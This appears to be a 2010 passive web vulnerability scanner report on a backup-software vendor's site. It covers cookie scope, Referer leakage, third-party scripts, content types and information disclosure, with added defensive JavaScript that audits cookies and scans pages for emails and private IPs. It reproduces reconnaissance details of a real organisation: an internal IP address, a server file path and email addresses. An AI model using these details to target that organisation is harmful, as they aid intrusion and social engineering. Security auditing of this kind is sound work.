Last-Modified: Tue, 16 Nov 2010 04:27:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www52
Content-Length: 0
Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
When the Set-Cookie header carries no Domain attribute, browsers treat the cookie as host-only: it is sent only to the exact host that issued it, not to its subdomains or to any parent domain. Omitting the explicit Domain attribute therefore gives the narrowest scope, which is safe and appropriate in most situations. Specifying a Domain attribute widens the scope to the named domain and every subdomain of it. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
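The following is an added example written for this edit, not code from the report or from the applications it covers, of checking Set-Cookie headers for the attributes discussed in the HttpOnly and cookie-scope findings above. REPORT_COOKIE is the s_vi header shown in the report; BROAD_COOKIE and GOOD_COOKIE, together with the hosts app.example.com and example.com, are constructed for illustration.

```javascript
// Added example (not from the report): auditing Set-Cookie headers for
// HttpOnly, Secure and an over-broad Domain attribute.

function parseSetCookie(header) {
  const parts = header.split(';').map(p => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const cookie = {
    name: eq === -1 ? parts[0] : parts[0].slice(0, eq),
    value: eq === -1 ? '' : parts[0].slice(eq + 1),
    attrs: {},
  };
  // Attribute names are case-insensitive; flags such as HttpOnly carry no value.
  for (const part of parts.slice(1)) {
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    cookie.attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return cookie;
}

// A Domain attribute naming a parent of the issuing host widens the cookie's
// scope to every subdomain of that parent. No Domain attribute means the
// cookie is host-only (RFC 6265). A leading dot is ignored by browsers.
function domainIsBroaderThanHost(domainAttr, issuingHost) {
  if (typeof domainAttr !== 'string') return false;
  const d = domainAttr.replace(/^\./, '').toLowerCase();
  const h = issuingHost.toLowerCase();
  return d !== h && h.endsWith('.' + d);
}

function auditSetCookie(header, issuingHost, { overHttps = true } = {}) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!('httponly' in c.attrs)) findings.push('missing HttpOnly');
  if (overHttps && !('secure' in c.attrs)) findings.push('missing Secure');
  if (domainIsBroaderThanHost(c.attrs.domain, issuingHost)) {
    findings.push('Domain=' + c.attrs.domain + ' is broader than ' + issuingHost);
  }
  return { name: c.name, findings };
}

// Header from the report; the request that received it was plain HTTP.
const REPORT_COOKIE = 's_vi=[CS]v1|26705B4E85010E89-400001068000283F[CE]; Expires=Sat, 14 Nov 2015 04:27:09 GMT; Domain=fisherinvestments.112.2o7.net; Path=/';
// Constructed samples: a session cookie scoped to a parent domain, and a
// correctly attributed one.
const BROAD_COOKIE = 'sid=abc123; Domain=example.com; Path=/';
const GOOD_COOKIE = 'sid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax';

function auditSamples() {
  return [
    auditSetCookie(REPORT_COOKIE, 'fisherinvestments.112.2o7.net', { overHttps: false }),
    auditSetCookie(BROAD_COOKIE, 'app.example.com'),
    auditSetCookie(GOOD_COOKIE, 'app.example.com'),
  ];
}

console.log(JSON.stringify(auditSamples(), null, 2));
```

The check treats a Domain attribute equal to the issuing host as acceptable even though, strictly, it still widens scope to subdomains of that host; whether that matters depends on what else is hosted there, which is exactly the review the remediation text asks for.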
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties. As defence in depth, a Referrer-Policy response header (for example no-referrer or strict-origin-when-cross-origin) instructs current browsers to withhold the path and query string from cross-origin requests, but it does nothing about logging or older browsers and is not a substitute for removing the data from the URL.
<!-- SiteCatalyst code version: H.6. Copyright 1997-2006 Omniture, Inc. More info available at http://www.omniture.com --> ...[SNIP]... <!-- Advertiser 'Fisher Investments', Include user in segment 'Fisher Remarketing Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY --> <img src="http://ad.yieldmanager.com/pixel?id=105668&t=2" width="1" height="1" border="0"> <br /> ...[SNIP]... </script> <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script> ...[SNIP]... <div style="display:inline;"> <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1066305854/?label=pFeACMaEsAEQvpK6_AM&guid=ON&script=0"/> </div> ...[SNIP]...
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code. Where a script must remain hosted by the third party, a Subresource Integrity hash (the integrity attribute on the script tag) makes the browser refuse a file whose contents have changed, but this only works for scripts whose contents are fixed, which is rarely the case for the analytics and advertising loaders of the kind shown above.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Onsite Backup Software for Network based Disk to Disk Backup for SMBs and RO ...[SNIP]... </form> <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script> ...[SNIP]... </div> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=anparasu"></script> ...[SNIP]... </script> <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script> ...[SNIP]... <!--VISISTAT SNIPPET//--> <script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=8Lqu"></script> ...[SNIP]...
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:26:24 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2010 20:31:09 GMT
ETag: "8cd2b-2180-49403b0363d40"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: application/x-javascript
Content-Length: 8576

/**
 * jquery.slideShow (1.0.2)
 * by Marcel Eichner (www.marceleichner.de)
 * <love@ephigenia.de>
 *
 * This simple slideshow plugin will provide your effect gallery with
 * some simple features:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Onsite Backup Software for Network based Disk to Disk Backup for SMBs and RO ...[SNIP]... <input value="noreply@vembu.com" name="from-email" type="hidden"> ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.207.110.10
Issue background
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.
Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
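The following is an added example written for this edit, not code from the report, of scanning a response body for the two kinds of disclosure discussed in the email-address and private-IP-address findings above. The sample body is constructed for illustration around values that do appear in the report (10.207.110.10, love@ephigenia.de, noreply@vembu.com); the other addresses in it are made up to exercise the range boundaries.

```javascript
// Added example (not from the report): finding email addresses and RFC 1918
// addresses in a response body, with octet and range validation so that
// version strings and malformed dotted quads are not reported.

const EMAIL_RE = /[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}/g;
const IPV4_RE = /\b(?:\d{1,3}\.){3}\d{1,3}\b/g;

// RFC 1918 ranges: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16.
// The dotted-quad regex also matches things like 10.999.1.1 or a version
// number such as 1.17.23.1, so every octet is checked before classifying.
function isRfc1918(ip) {
  const octets = ip.split('.').map(Number);
  if (octets.length !== 4 || octets.some(o => !Number.isInteger(o) || o < 0 || o > 255)) {
    return false;
  }
  const [a, b] = octets;
  return a === 10 || (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

function findDisclosures(body) {
  const emails = [...new Set(body.match(EMAIL_RE) || [])];
  const privateIps = [...new Set((body.match(IPV4_RE) || []).filter(isRfc1918))];
  return { emails, privateIps };
}

// Constructed sample body. 10.207.110.10 and the two email addresses come
// from the report; the remaining addresses are invented boundary cases.
const SAMPLE_BODY = [
  '<!-- served by 10.207.110.10 -->',
  '<!-- upstream 172.16.4.9, cdn 172.32.0.1, resolver 8.8.8.8, bogus 10.999.1.1 -->',
  '/** by Marcel Eichner <love@ephigenia.de> */',
  '<input value="noreply@vembu.com" name="from-email" type="hidden">',
  'router 192.168.1.1 and again 192.168.1.1',
].join('\n');

console.log(findDisclosures(SAMPLE_BODY));
```

Run over a crawl, the email list needs a review pass (a helpdesk alias is fine, a developer's personal address is not), while every private address is worth a ticket unless it is deliberately documented.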
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-Type header which correctly and unambiguously states the MIME type of the content in the response body. Sending X-Content-Type-Options: nosniff alongside it tells browsers not to second-guess the declared type by inspecting the content.
<br /> <b>Warning</b>: include(../secure/constants.php) [<a href='function.include'>function.include</a>]: failed to open stream: Permission denied in <b>/home/vembuweb/web/style/style.css.php</b> on ...[SNIP]...
Report generated by Hoyt LLC at Mon Nov 15 12:04:33 CST 2010.